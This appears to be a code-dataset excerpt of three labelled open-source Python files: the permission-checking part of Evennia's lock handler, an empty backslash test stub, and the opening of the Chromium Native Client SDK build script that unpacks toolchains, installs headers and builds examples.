return str(self).split(';')
def remove(self, access_type):
"""
Remove a particular lock from the handler
Args:
access_type (str): The type of lock to remove.
Returns:
success (bool): If the access_type was not found
in the lock, this returns `False`.
"""
if access_type in self.locks:
del self.locks[access_type]
self._save_locks()
return True
return False
delete = remove # alias for historical reasons
def clear(self):
"""
Remove all locks in the handler.
"""
self.locks = {}
self.lock_storage = ""
self._save_locks()
def reset(self):
"""
        Set the reset flag, so that the lock will be re-cached at the
        next check. This is usually called by @reload.
"""
self._cache_locks(self.obj.lock_storage)
self.cache_lock_bypass(self.obj)
def check(self, accessing_obj, access_type, default=False, no_superuser_bypass=False):
"""
Checks a lock of the correct type by passing execution off to
the lock function(s).
Args:
accessing_obj (object): The object seeking access.
access_type (str): The type of access wanted.
default (bool, optional): If no suitable lock type is
found, default to this result.
            no_superuser_bypass (bool): Don't use this unless you
                really need to; it makes superusers subject to
                the lock check.
Notes:
            A lock is executed in the following way:
Parsing the lockstring, we (during cache) extract the valid
lock functions and store their function objects in the right
order along with their args/kwargs. These are now executed in
sequence, creating a list of True/False values. This is put
into the evalstring, which is a string of AND/OR/NOT entries
separated by placeholders where each function result should
go. We just put those results in and evaluate the string to
get a final, combined True/False value for the lockstring.
The important bit with this solution is that the full
lockstring is never blindly evaluated, and thus there (should
be) no way to sneak in malign code in it. Only "safe" lock
functions (as defined by your settings) are executed.
"""
try:
# check if the lock should be bypassed (e.g. superuser status)
if accessing_obj.locks.lock_bypass and not no_superuser_bypass:
return True
except AttributeError:
# happens before session is initiated.
if not no_superuser_bypass and ((hasattr(accessing_obj, 'is_superuser') and accessing_obj.is_superuser) or
(hasattr(accessing_obj, 'account') and hasattr(accessing_obj.account, 'is_superuser') and accessing_obj.account.is_superuser) or
(hasattr(accessing_obj, 'get_account') and (not accessing_obj.get_account() or accessing_obj.get_account().is_superuser))):
return True
# no superuser or bypass -> normal lock operation
if access_type in self.locks:
# we have a lock, test it.
evalstring, func_tup, raw_string = self.locks[access_type]
# execute all lock funcs in the correct order, producing a tuple of True/False results.
true_false = tuple(bool(tup[0](accessing_obj, self.obj, *tup[1], **tup[2])) for tup in func_tup)
# the True/False tuple goes into evalstring, which combines them
# with AND/OR/NOT in order to get the final result.
return eval(evalstring % true_false)
else:
return default
def _eval_access_type(self, accessing_obj, locks, access_type):
"""
Helper method for evaluating the access type using eval().
Args:
accessing_obj (object): Object seeking access.
locks (dict): The pre-parsed representation of all access-types.
access_type (str): An access-type key to evaluate.
"""
evalstring, func_tup, raw_string = locks[access_type]
true_false = tuple(tup[0](accessing_obj, self.obj, *tup[1], **tup[2])
for tup in func_tup)
return eval(evalstring % true_false)
def check_lockstring(self, accessing_obj, lockstring, no_superuser_bypass=False,
default=False, access_type=None):
"""
Do a direct check against a lockstring ('atype:func()..'),
without any intermediary storage on the accessed object.
Args:
accessing_obj (object or None): The object seeking access.
Importantly, this can be left unset if the lock functions
don't access it, no updating or storage of locks are made
against this object in this method.
lockstring (str): Lock string to check, on the form
`"access_type:lock_definition"` where the `access_type`
part can potentially be set to a dummy value to just check
a lock condition.
no_superuser_bypass (bool, optional): Force superusers to heed lock.
default (bool, optional): Fallback result to use if `access_type` is set
but no such `access_type` is found in the given `lockstring`.
access_type (str, bool): If set, only this access_type will be looked up
among the locks defined by `lockstring`.
Return:
access (bool): If check is passed or not.
"""
try:
if accessing_obj.locks.lock_bypass and not no_superuser_bypass:
return True
except AttributeError:
            if not no_superuser_bypass and ((hasattr(accessing_obj, 'is_superuser') and accessing_obj.is_superuser) or
(hasattr(accessing_obj, 'account') and hasattr(accessing_obj.account, 'is_superuser') and accessing_obj.account.is_superuser) or
(hasattr(accessing_obj, 'get_account') and (not accessing_obj.get_account() or accessing_obj.get_account().is_superuser))):
return True
if ":" not in lockstring:
lockstring = "%s:%s" % ("_dummy", lockstring)
locks = self._parse_lockstring(lockstring)
if access_type:
if access_type not in locks:
return default
else:
return self._eval_access_type(
accessing_obj, locks, access_type)
else:
            # if no access type was given and multiple locks were
            # embedded in the lockstring, we assume all must be true
return all(self._eval_access_type(accessing_obj, locks, access_type) for access_type in locks)
def _test():
# testing
class TestObj(object):
pass
import pdb
obj1 = TestObj()
obj2 = TestObj()
# obj1.lock_storage = "owner:dbref(#4);edit:dbref(#5) or perm(Admin);examine:perm(Builder);delete:perm(Admin);get:all()"
#obj1.lock_storage = "cmd:all();admin:id(1);listen:all();send:all()"
obj1.lock_storage = "listen:perm(Developer)"
pdb.set_trace()
obj1.locks = LockHandler(obj1)
obj2.permissions.add("Developer")
obj2.id = 4
# obj1.locks.add("edit:attr(test)")
print("comparing obj2.permissions (%s) vs obj1.locks (%s)" % (obj2.permissions, obj1.locks))
print(obj1.locks.check(obj2, 'owner'))
print(obj1.locks.check(obj2, 'edit'))
print(obj1.locks.check(obj2, 'examine'))
print(obj1.locks.check(obj2, 'delete'))
print(obj1.locks.check(obj2, 'get'))
print(obj1.locks.check(obj2, 'listen'))
|
feend78/evennia
|
evennia/locks/lockhandler.py
|
Python
|
bsd-3-clause
| 20,594
|
import backslash
# py.test style tests here
|
yotamr/backslash-python
|
tests/test_backslash.py
|
Python
|
bsd-3-clause
| 44
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Entry point for both build and try bots
This script is invoked from XXX, usually without arguments
to package an SDK. It automatically determines whether
this SDK is for mac, win, or linux.
The script inspects the following environment variables:
BUILDBOT_BUILDERNAME to determine whether the script is run locally
and whether it should upload an SDK to file storage (GSTORE)
"""
# pylint: disable=W0621
# std python includes
import copy
import datetime
import optparse
import os
import re
import subprocess
import sys
# local includes
import buildbot_common
import build_updater
import build_utils
import generate_make
import generate_notice
import manifest_util
import test_sdk
# Create the various paths of interest
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
SDK_SRC_DIR = os.path.dirname(SCRIPT_DIR)
SDK_EXAMPLE_DIR = os.path.join(SDK_SRC_DIR, 'examples')
SDK_LIBRARY_DIR = os.path.join(SDK_SRC_DIR, 'libraries')
SDK_DIR = os.path.dirname(SDK_SRC_DIR)
SRC_DIR = os.path.dirname(SDK_DIR)
NACL_DIR = os.path.join(SRC_DIR, 'native_client')
OUT_DIR = os.path.join(SRC_DIR, 'out')
PPAPI_DIR = os.path.join(SRC_DIR, 'ppapi')
# Add SDK make tools scripts to the python path.
sys.path.append(os.path.join(SDK_SRC_DIR, 'tools'))
sys.path.append(os.path.join(NACL_DIR, 'build'))
import getos
import http_download
import oshelpers
GSTORE = 'https://commondatastorage.googleapis.com/nativeclient-mirror/nacl/'
MAKE = 'nacl_sdk/make_3_81/make.exe'
CYGTAR = os.path.join(NACL_DIR, 'build', 'cygtar.py')
options = None
def GetGlibcToolchain(platform, arch):
tcdir = os.path.join(NACL_DIR, 'toolchain', '.tars')
tcname = 'toolchain_%s_%s.tar.bz2' % (platform, arch)
return os.path.join(tcdir, tcname)
def GetNewlibToolchain(platform, arch):
tcdir = os.path.join(NACL_DIR, 'toolchain', '.tars')
tcname = 'naclsdk_%s_%s.tgz' % (platform, arch)
return os.path.join(tcdir, tcname)
def GetPNaClToolchain(os_platform, arch):
tcdir = os.path.join(NACL_DIR, 'toolchain', '.tars')
tcname = 'naclsdk_pnacl_%s_%s.tgz' % (os_platform, arch)
return os.path.join(tcdir, tcname)
def GetScons():
if sys.platform in ['cygwin', 'win32']:
return 'scons.bat'
return './scons'
def GetArchName(arch, xarch=None):
if xarch:
return arch + '-' + str(xarch)
return arch
def GetToolchainNaClInclude(tcname, tcpath, arch, xarch=None):
if arch == 'x86':
if tcname == 'pnacl':
return os.path.join(tcpath, 'newlib', 'sdk', 'include')
return os.path.join(tcpath, 'x86_64-nacl', 'include')
else:
buildbot_common.ErrorExit('Unknown architecture.')
def GetToolchainNaClLib(tcname, tcpath, arch, xarch):
if arch == 'x86':
if tcname == 'pnacl':
return os.path.join(tcpath, 'newlib', 'sdk', 'lib')
if str(xarch) == '32':
return os.path.join(tcpath, 'x86_64-nacl', 'lib32')
if str(xarch) == '64':
return os.path.join(tcpath, 'x86_64-nacl', 'lib')
buildbot_common.ErrorExit('Unknown architecture.')
def GetPNaClNativeLib(tcpath, arch):
if arch not in ['arm', 'x86-32', 'x86-64']:
buildbot_common.ErrorExit('Unknown architecture %s.' % arch)
return os.path.join(tcpath, 'lib-' + arch)
def GetBuildArgs(tcname, tcpath, outdir, arch, xarch=None):
"""Return list of scons build arguments to generate user libraries."""
scons = GetScons()
mode = '--mode=opt-host,nacl'
arch_name = GetArchName(arch, xarch)
plat = 'platform=' + arch_name
binarg = 'bindir=' + os.path.join(outdir, 'tools')
lib = 'libdir=' + GetToolchainNaClLib(tcname, tcpath, arch, xarch)
args = [scons, mode, plat, binarg, lib, '-j10',
'install_bin', 'install_lib']
if tcname == 'glibc':
args.append('--nacl_glibc')
if tcname == 'pnacl':
args.append('bitcode=1')
print "Building %s (%s): %s" % (tcname, arch, ' '.join(args))
return args
def BuildStepDownloadToolchains(platform):
buildbot_common.BuildStep('Rerun hooks to get toolchains')
buildbot_common.Run(['gclient', 'runhooks'],
cwd=SRC_DIR, shell=(platform == 'win'))
def BuildStepCleanPepperDirs(pepperdir, pepperdir_old):
buildbot_common.BuildStep('Clean Pepper Dirs')
buildbot_common.RemoveDir(pepperdir_old)
buildbot_common.RemoveDir(pepperdir)
buildbot_common.MakeDir(pepperdir)
def BuildStepMakePepperDirs(pepperdir, subdirs):
for subdir in subdirs:
buildbot_common.MakeDir(os.path.join(pepperdir, subdir))
def BuildStepCopyTextFiles(pepperdir, pepper_ver, revision):
buildbot_common.BuildStep('Add Text Files')
files = ['AUTHORS', 'COPYING', 'LICENSE']
files = [os.path.join(SDK_SRC_DIR, filename) for filename in files]
oshelpers.Copy(['-v'] + files + [pepperdir])
# Replace a few placeholders in README
readme_text = open(os.path.join(SDK_SRC_DIR, 'README'), 'rt').read()
readme_text = readme_text.replace('${VERSION}', pepper_ver)
readme_text = readme_text.replace('${REVISION}', revision)
# Year/Month/Day Hour:Minute:Second
time_format = '%Y/%m/%d %H:%M:%S'
readme_text = readme_text.replace('${DATE}',
datetime.datetime.now().strftime(time_format))
open(os.path.join(pepperdir, 'README'), 'wt').write(readme_text)
def BuildStepUntarToolchains(pepperdir, platform, arch, toolchains):
buildbot_common.BuildStep('Untar Toolchains')
tcname = platform + '_' + arch
tmpdir = os.path.join(SRC_DIR, 'out', 'tc_temp')
buildbot_common.RemoveDir(tmpdir)
buildbot_common.MakeDir(tmpdir)
if 'newlib' in toolchains:
# Untar the newlib toolchains
tarfile = GetNewlibToolchain(platform, arch)
buildbot_common.Run([sys.executable, CYGTAR, '-C', tmpdir, '-xf', tarfile],
cwd=NACL_DIR)
# Then rename/move it to the pepper toolchain directory
srcdir = os.path.join(tmpdir, 'sdk', 'nacl-sdk')
newlibdir = os.path.join(pepperdir, 'toolchain', tcname + '_newlib')
buildbot_common.Move(srcdir, newlibdir)
if 'glibc' in toolchains:
# Untar the glibc toolchains
tarfile = GetGlibcToolchain(platform, arch)
buildbot_common.Run([sys.executable, CYGTAR, '-C', tmpdir, '-xf', tarfile],
cwd=NACL_DIR)
# Then rename/move it to the pepper toolchain directory
srcdir = os.path.join(tmpdir, 'toolchain', tcname)
glibcdir = os.path.join(pepperdir, 'toolchain', tcname + '_glibc')
buildbot_common.Move(srcdir, glibcdir)
# Untar the pnacl toolchains
if 'pnacl' in toolchains:
tmpdir = os.path.join(tmpdir, 'pnacl')
buildbot_common.RemoveDir(tmpdir)
buildbot_common.MakeDir(tmpdir)
tarfile = GetPNaClToolchain(platform, arch)
buildbot_common.Run([sys.executable, CYGTAR, '-C', tmpdir, '-xf', tarfile],
cwd=NACL_DIR)
# Then rename/move it to the pepper toolchain directory
pnacldir = os.path.join(pepperdir, 'toolchain', tcname + '_pnacl')
buildbot_common.Move(tmpdir, pnacldir)
if options.gyp and sys.platform not in ['cygwin', 'win32']:
    # If the gyp option is specified we install a toolchain
# wrapper so that gyp can switch toolchains via a commandline
# option.
bindir = os.path.join(pepperdir, 'toolchain', tcname, 'bin')
wrapper = os.path.join(SDK_SRC_DIR, 'tools', 'compiler-wrapper.py')
buildbot_common.MakeDir(bindir)
buildbot_common.CopyFile(wrapper, bindir)
# Module 'os' has no 'symlink' member (on Windows).
# pylint: disable=E1101
os.symlink('compiler-wrapper.py', os.path.join(bindir, 'i686-nacl-g++'))
os.symlink('compiler-wrapper.py', os.path.join(bindir, 'i686-nacl-gcc'))
os.symlink('compiler-wrapper.py', os.path.join(bindir, 'i686-nacl-ar'))
HEADER_MAP = {
'newlib': {
'pthread.h': 'src/untrusted/pthread/pthread.h',
'semaphore.h': 'src/untrusted/pthread/semaphore.h',
'nacl/dynamic_annotations.h':
'src/untrusted/valgrind/dynamic_annotations.h',
'nacl/nacl_dyncode.h': 'src/untrusted/nacl/nacl_dyncode.h',
'nacl/nacl_startup.h': 'src/untrusted/nacl/nacl_startup.h',
'nacl/nacl_thread.h': 'src/untrusted/nacl/nacl_thread.h',
'pnacl.h': 'src/untrusted/nacl/pnacl.h',
'irt.h': 'src/untrusted/irt/irt.h',
'irt_ppapi.h': 'src/untrusted/irt/irt_ppapi.h',
},
'glibc': {
'nacl/dynamic_annotations.h':
'src/untrusted/valgrind/dynamic_annotations.h',
'nacl/nacl_dyncode.h': 'src/untrusted/nacl/nacl_dyncode.h',
'nacl/nacl_startup.h': 'src/untrusted/nacl/nacl_startup.h',
'nacl/nacl_thread.h': 'src/untrusted/nacl/nacl_thread.h',
'pnacl.h': 'src/untrusted/nacl/pnacl.h',
'irt.h': 'src/untrusted/irt/irt.h',
'irt_ppapi.h': 'src/untrusted/irt/irt_ppapi.h',
},
'libs': {
},
}
def InstallHeaders(tc_dst_inc, pepper_ver, tc_name):
"""Copies NaCl headers to expected locations in the toolchain."""
tc_map = HEADER_MAP[tc_name]
for filename in tc_map:
src = os.path.join(NACL_DIR, tc_map[filename])
dst = os.path.join(tc_dst_inc, filename)
buildbot_common.MakeDir(os.path.dirname(dst))
buildbot_common.CopyFile(src, dst)
# Clean out per toolchain ppapi directory
ppapi = os.path.join(tc_dst_inc, 'ppapi')
buildbot_common.RemoveDir(ppapi)
# Copy in c and c/dev headers
buildbot_common.MakeDir(os.path.join(ppapi, 'c', 'dev'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'c', '*.h'),
os.path.join(ppapi, 'c'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'c', 'dev', '*.h'),
os.path.join(ppapi, 'c', 'dev'))
# Run the generator to overwrite IDL files
generator_args = [sys.executable, 'generator.py', '--wnone', '--cgen',
'--verbose', '--dstroot=%s/c' % ppapi]
if pepper_ver:
generator_args.append('--release=M' + pepper_ver)
buildbot_common.Run(generator_args,
cwd=os.path.join(PPAPI_DIR, 'generators'))
# Remove private and trusted interfaces
buildbot_common.RemoveDir(os.path.join(ppapi, 'c', 'private'))
buildbot_common.RemoveDir(os.path.join(ppapi, 'c', 'trusted'))
# Copy in the C++ headers
buildbot_common.MakeDir(os.path.join(ppapi, 'cpp', 'dev'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'cpp', '*.h'),
os.path.join(ppapi, 'cpp'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'cpp', 'dev', '*.h'),
os.path.join(ppapi, 'cpp', 'dev'))
buildbot_common.MakeDir(os.path.join(ppapi, 'utility', 'graphics'))
buildbot_common.MakeDir(os.path.join(ppapi, 'utility', 'threading'))
buildbot_common.MakeDir(os.path.join(ppapi, 'utility', 'websocket'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'utility', '*.h'),
os.path.join(ppapi, 'utility'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'utility', 'graphics', '*.h'),
os.path.join(ppapi, 'utility', 'graphics'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'utility', 'threading', '*.h'),
os.path.join(ppapi, 'utility', 'threading'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'utility', 'websocket', '*.h'),
os.path.join(ppapi, 'utility', 'websocket'))
# Copy in the gles2 headers
buildbot_common.MakeDir(os.path.join(ppapi, 'gles2'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'lib', 'gl', 'gles2', '*.h'),
os.path.join(ppapi, 'gles2'))
# Copy the EGL headers
buildbot_common.MakeDir(os.path.join(tc_dst_inc, 'EGL'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'lib', 'gl', 'include', 'EGL', '*.h'),
os.path.join(tc_dst_inc, 'EGL'))
# Copy the GLES2 headers
buildbot_common.MakeDir(os.path.join(tc_dst_inc, 'GLES2'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'lib', 'gl', 'include', 'GLES2', '*.h'),
os.path.join(tc_dst_inc, 'GLES2'))
# Copy the KHR headers
buildbot_common.MakeDir(os.path.join(tc_dst_inc, 'KHR'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'lib', 'gl', 'include', 'KHR', '*.h'),
os.path.join(tc_dst_inc, 'KHR'))
# Copy the lib files
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'lib'),
os.path.join(tc_dst_inc, 'ppapi'))
def MakeNinjaRelPath(path):
return os.path.join(os.path.relpath(OUT_DIR, SRC_DIR), path)
def GypNinjaBuild_X86(pepperdir, platform, toolchains):
build_dir = 'gypbuild'
GypNinjaBuild_X86_Nacl(platform, build_dir)
GypNinjaBuild_X86_Chrome(build_dir)
ninja_out_dir = os.path.join(OUT_DIR, build_dir, 'Release')
# src_file, dst_file, is_host_exe?
tools_files = [
('sel_ldr', 'sel_ldr_x86_32', True),
('ncval_x86_32', 'ncval_x86_32', True),
('ncval_arm', 'ncval_arm', True),
('irt_core_newlib_x32.nexe', 'irt_core_newlib_x32.nexe', False),
('irt_core_newlib_x64.nexe', 'irt_core_newlib_x64.nexe', False),
]
if platform != 'mac':
# Mac doesn't build 64-bit binaries.
tools_files.append(('sel_ldr64', 'sel_ldr_x86_64', True))
tools_files.append(('ncval_x86_64', 'ncval_x86_64', True))
if platform == 'linux':
tools_files.append(('nacl_helper_bootstrap',
'nacl_helper_bootstrap_x86_32', True))
tools_files.append(('nacl_helper_bootstrap64',
'nacl_helper_bootstrap_x86_64', True))
buildbot_common.MakeDir(os.path.join(pepperdir, 'tools'))
for src, dst, host_exe in tools_files:
if platform == 'win' and host_exe:
src += '.exe'
dst += '.exe'
buildbot_common.CopyFile(
os.path.join(ninja_out_dir, src),
os.path.join(pepperdir, 'tools', dst))
for tc in set(toolchains) & set(['newlib', 'glibc']):
for bits in '32', '64':
tc_dir = 'tc_' + tc
lib_dir = 'lib' + bits
src_dir = os.path.join(ninja_out_dir, 'gen', tc_dir, lib_dir)
tcpath = os.path.join(pepperdir, 'toolchain',
'%s_x86_%s' % (platform, tc))
dst_dir = GetToolchainNaClLib(tc, tcpath, 'x86', bits)
buildbot_common.MakeDir(dst_dir)
buildbot_common.CopyDir(os.path.join(src_dir, '*.a'), dst_dir)
if tc == 'newlib':
buildbot_common.CopyDir(os.path.join(src_dir, '*.o'), dst_dir)
if tc == 'glibc':
buildbot_common.CopyDir(os.path.join(src_dir, '*.so'), dst_dir)
# TODO(binji): temporary hack; copy crt1.o from sdk toolchain directory.
lib_dir = os.path.join(ninja_out_dir, 'gen', 'sdk', 'toolchain',
'%s_x86_%s' % (platform, tc), 'x86_64-nacl', 'lib')
if bits == '32':
lib_dir += '32'
buildbot_common.CopyFile(os.path.join(lib_dir, 'crt1.o'), dst_dir)
def GypNinjaBuild_X86_Nacl(platform, rel_out_dir):
gyp_py = os.path.join(NACL_DIR, 'build', 'gyp_nacl')
nacl_core_sdk_gyp = os.path.join(NACL_DIR, 'build', 'nacl_core_sdk.gyp')
all_gyp = os.path.join(NACL_DIR, 'build', 'all.gyp')
out_dir = MakeNinjaRelPath(rel_out_dir)
GypNinjaBuild('ia32', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir)
GypNinjaBuild('ia32', gyp_py, all_gyp, 'ncval_x86_32', out_dir)
GypNinjaBuild(None, gyp_py, all_gyp, 'ncval_arm', out_dir)
if platform == 'win':
NinjaBuild('sel_ldr64', out_dir)
NinjaBuild('ncval_x86_64', out_dir)
elif platform == 'linux':
out_dir_64 = MakeNinjaRelPath(rel_out_dir + '_64')
GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'sel_ldr', out_dir_64)
GypNinjaBuild('x64', gyp_py, all_gyp, 'ncval_x86_64', out_dir_64)
# We only need sel_ldr and ncval_x86_64 from the 64-bit out directory.
# sel_ldr needs to be renamed, so we'll call it sel_ldr64.
files_to_copy = [
('sel_ldr', 'sel_ldr64'),
('ncval_x86_64', 'ncval_x86_64'),
]
files_to_copy.append(('nacl_helper_bootstrap', 'nacl_helper_bootstrap64'))
for src, dst in files_to_copy:
buildbot_common.CopyFile(
os.path.join(SRC_DIR, out_dir_64, 'Release', src),
os.path.join(SRC_DIR, out_dir, 'Release', dst))
def GypNinjaBuild_X86_Chrome(rel_out_dir):
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'ppapi_untrusted.gyp')
targets = ['ppapi_cpp_lib', 'ppapi_gles2_lib']
GypNinjaBuild('ia32', gyp_py, gyp_file, targets, out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client',
'native_client.gyp')
GypNinjaBuild('ia32', gyp_py, gyp_file, 'ppapi_lib', out_dir)
def GypNinjaBuild_Pnacl(rel_out_dir, target_arch):
# TODO(binji): This will build the pnacl_irt_shim twice; once as part of the
# Chromium build, and once here. When we move more of the SDK build process
# to gyp, we can remove this.
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client', 'src',
'untrusted', 'pnacl_irt_shim', 'pnacl_irt_shim.gyp')
targets = ['pnacl_irt_shim']
GypNinjaBuild(target_arch, gyp_py, gyp_file, targets, out_dir)
def GypNinjaBuild(arch, gyp_py_script, gyp_file, targets, out_dir):
gyp_env = copy.copy(os.environ)
gyp_env['GYP_GENERATORS'] = 'ninja'
gyp_defines = []
if options.mac_sdk:
gyp_defines.append('mac_sdk=%s' % options.mac_sdk)
if arch:
gyp_defines.append('target_arch=%s' % arch)
gyp_env['GYP_DEFINES'] = ' '.join(gyp_defines)
gyp_generator_flags = ['-G', 'output_dir=%s' % (out_dir,)]
gyp_depth = '--depth=.'
buildbot_common.Run(
[sys.executable, gyp_py_script, gyp_file, gyp_depth] + \
gyp_generator_flags,
cwd=SRC_DIR,
env=gyp_env)
NinjaBuild(targets, out_dir)
def NinjaBuild(targets, out_dir):
if type(targets) is not list:
targets = [targets]
out_config_dir = os.path.join(out_dir, 'Release')
buildbot_common.Run(['ninja', '-C', out_config_dir] + targets, cwd=SRC_DIR)
def BuildStepBuildToolchains(pepperdir, platform, arch, pepper_ver,
toolchains):
buildbot_common.BuildStep('SDK Items')
tcname = platform + '_' + arch
newlibdir = os.path.join(pepperdir, 'toolchain', tcname + '_newlib')
glibcdir = os.path.join(pepperdir, 'toolchain', tcname + '_glibc')
pnacldir = os.path.join(pepperdir, 'toolchain', tcname + '_pnacl')
# Run scons TC build steps
if arch == 'x86':
if set(toolchains) & set(['newlib', 'glibc']):
GypNinjaBuild_X86(pepperdir, platform, toolchains)
if 'newlib' in toolchains:
InstallHeaders(GetToolchainNaClInclude('newlib', newlibdir, 'x86'),
pepper_ver,
'newlib')
if 'glibc' in toolchains:
InstallHeaders(GetToolchainNaClInclude('glibc', glibcdir, 'x86'),
pepper_ver,
'glibc')
if 'pnacl' in toolchains:
shell = platform == 'win'
buildbot_common.Run(
GetBuildArgs('pnacl', pnacldir, pepperdir, 'x86', '32'),
cwd=NACL_DIR, shell=shell)
buildbot_common.Run(
GetBuildArgs('pnacl', pnacldir, pepperdir, 'x86', '64'),
cwd=NACL_DIR, shell=shell)
for arch in ('ia32', 'arm'):
# Fill in the latest native pnacl shim library from the chrome build.
GypNinjaBuild_Pnacl('gypbuild-' + arch, arch)
release_build_dir = os.path.join(OUT_DIR, 'gypbuild-' + arch,
'Release')
pnacl_libdir_map = { 'ia32': 'x86-64', 'arm': 'arm' }
buildbot_common.CopyFile(
os.path.join(release_build_dir, 'libpnacl_irt_shim.a'),
GetPNaClNativeLib(pnacldir, pnacl_libdir_map[arch]))
InstallHeaders(GetToolchainNaClInclude('pnacl', pnacldir, 'x86'),
pepper_ver,
'newlib')
else:
buildbot_common.ErrorExit('Missing arch %s' % arch)
def BuildStepCopyBuildHelpers(pepperdir, platform):
buildbot_common.BuildStep('Copy build helpers')
buildbot_common.CopyDir(os.path.join(SDK_SRC_DIR, 'tools', '*.py'),
os.path.join(pepperdir, 'tools'))
if platform == 'win':
buildbot_common.BuildStep('Add MAKE')
http_download.HttpDownload(GSTORE + MAKE,
os.path.join(pepperdir, 'tools', 'make.exe'))
EXAMPLE_LIST = [
'debugging',
'dlopen',
'file_histogram',
'file_io',
'gamepad',
'geturl',
'hello_nacl_mounts',
'hello_world',
'hello_world_gles',
'hello_world_interactive',
'input_events',
'load_progress',
'mouselock',
'pi_generator',
'sine_synth',
'websocket',
]
LIBRARY_LIST = [
'nacl_mounts',
'ppapi',
'ppapi_cpp',
'ppapi_gles2',
'pthread',
]
LIB_DICT = {
'linux': [],
'mac': [],
'win': ['x86_32']
}
def MakeDirectoryOrClobber(pepperdir, dirname, clobber):
dirpath = os.path.join(pepperdir, dirname)
if clobber:
buildbot_common.RemoveDir(dirpath)
buildbot_common.MakeDir(dirpath)
return dirpath
def BuildStepCopyExamples(pepperdir, toolchains, build_experimental, clobber):
buildbot_common.BuildStep('Copy examples')
if not os.path.exists(os.path.join(pepperdir, 'tools')):
buildbot_common.ErrorExit('Examples depend on missing tools.')
if not os.path.exists(os.path.join(pepperdir, 'toolchain')):
buildbot_common.ErrorExit('Examples depend on missing toolchains.')
exampledir = MakeDirectoryOrClobber(pepperdir, 'examples', clobber)
libdir = MakeDirectoryOrClobber(pepperdir, 'lib', clobber)
plat = getos.GetPlatform()
for arch in LIB_DICT[plat]:
buildbot_common.MakeDir(os.path.join(libdir, '%s_%s_host' % (plat, arch)))
if options.gyp and plat != 'win':
configs = ['debug', 'release']
else:
configs = ['Debug', 'Release']
for config in configs:
buildbot_common.MakeDir(os.path.join(libdir, '%s_%s_host' % (plat, arch),
config))
MakeDirectoryOrClobber(pepperdir, 'src', clobber)
# Copy individual files
files = ['favicon.ico', 'httpd.cmd']
for filename in files:
oshelpers.Copy(['-v', os.path.join(SDK_EXAMPLE_DIR, filename), exampledir])
args = ['--dstroot=%s' % pepperdir, '--master']
for toolchain in toolchains:
args.append('--' + toolchain)
for example in EXAMPLE_LIST:
dsc = os.path.join(SDK_EXAMPLE_DIR, example, 'example.dsc')
args.append(dsc)
for library in LIBRARY_LIST:
dsc = os.path.join(SDK_LIBRARY_DIR, library, 'library.dsc')
args.append(dsc)
if build_experimental:
args.append('--experimental')
if generate_make.main(args):
buildbot_common.ErrorExit('Failed to build examples.')
def GetWindowsEnvironment():
sys.path.append(os.path.join(NACL_DIR, 'buildbot'))
import buildbot_standard
# buildbot_standard.SetupWindowsEnvironment expects a "context" object. We'll
# fake enough of that here to work.
class FakeContext(object):
def __init__(self):
self.env = os.environ
def GetEnv(self, key):
return self.env[key]
def __getitem__(self, key):
return self.env[key]
def SetEnv(self, key, value):
self.env[key] = value
def __setitem__(self, key, value):
self.env[key] = value
context = FakeContext()
buildbot_standard.SetupWindowsEnvironment(context)
# buildbot_standard.SetupWindowsEnvironment adds the directory which contains
# vcvarsall.bat to the path, but not the directory which contains cl.exe,
# link.exe, etc.
# Running vcvarsall.bat adds the correct directories to the path, which we
# extract below.
process = subprocess.Popen('vcvarsall.bat x86 > NUL && set',
stdout=subprocess.PIPE, env=context.env, shell=True)
stdout, _ = process.communicate()
# Parse environment from "set" command above.
# It looks like this:
# KEY1=VALUE1\r\n
# KEY2=VALUE2\r\n
# ...
  return dict(line.split('=', 1) for line in stdout.split('\r\n')[:-1])
def BuildStepMakeAll(pepperdir, platform, directory, step_name, clean=False):
buildbot_common.BuildStep(step_name)
make_dir = os.path.join(pepperdir, directory)
makefile = os.path.join(make_dir, 'Makefile')
if os.path.isfile(makefile):
print "\n\nMake: " + make_dir
if platform == 'win':
# We need to modify the environment to build host on Windows.
env = GetWindowsEnvironment()
make = os.path.join(make_dir, 'make.bat')
else:
env = os.environ
make = 'make'
buildbot_common.Run([make, '-j8'],
cwd=os.path.abspath(make_dir), env=env)
if clean:
# Clean to remove temporary files but keep the built libraries.
buildbot_common.Run([make, '-j8', 'clean'],
cwd=os.path.abspath(make_dir))
def BuildStepBuildLibraries(pepperdir, platform, directory, clean=True):
BuildStepMakeAll(pepperdir, platform, directory, 'Build Libraries',
clean=clean)
def BuildStepGenerateNotice(pepperdir):
# Look for LICENSE files
license_filenames_re = re.compile('LICENSE|COPYING')
license_files = []
for root, _, files in os.walk(pepperdir):
for filename in files:
if license_filenames_re.match(filename):
path = os.path.join(root, filename)
license_files.append(path)
print '\n'.join(license_files)
notice_filename = os.path.join(pepperdir, 'NOTICE')
generate_notice.Generate(notice_filename, pepperdir, license_files)
def BuildStepTarBundle(pepper_ver, tarfile):
buildbot_common.BuildStep('Tar Pepper Bundle')
buildbot_common.MakeDir(os.path.dirname(tarfile))
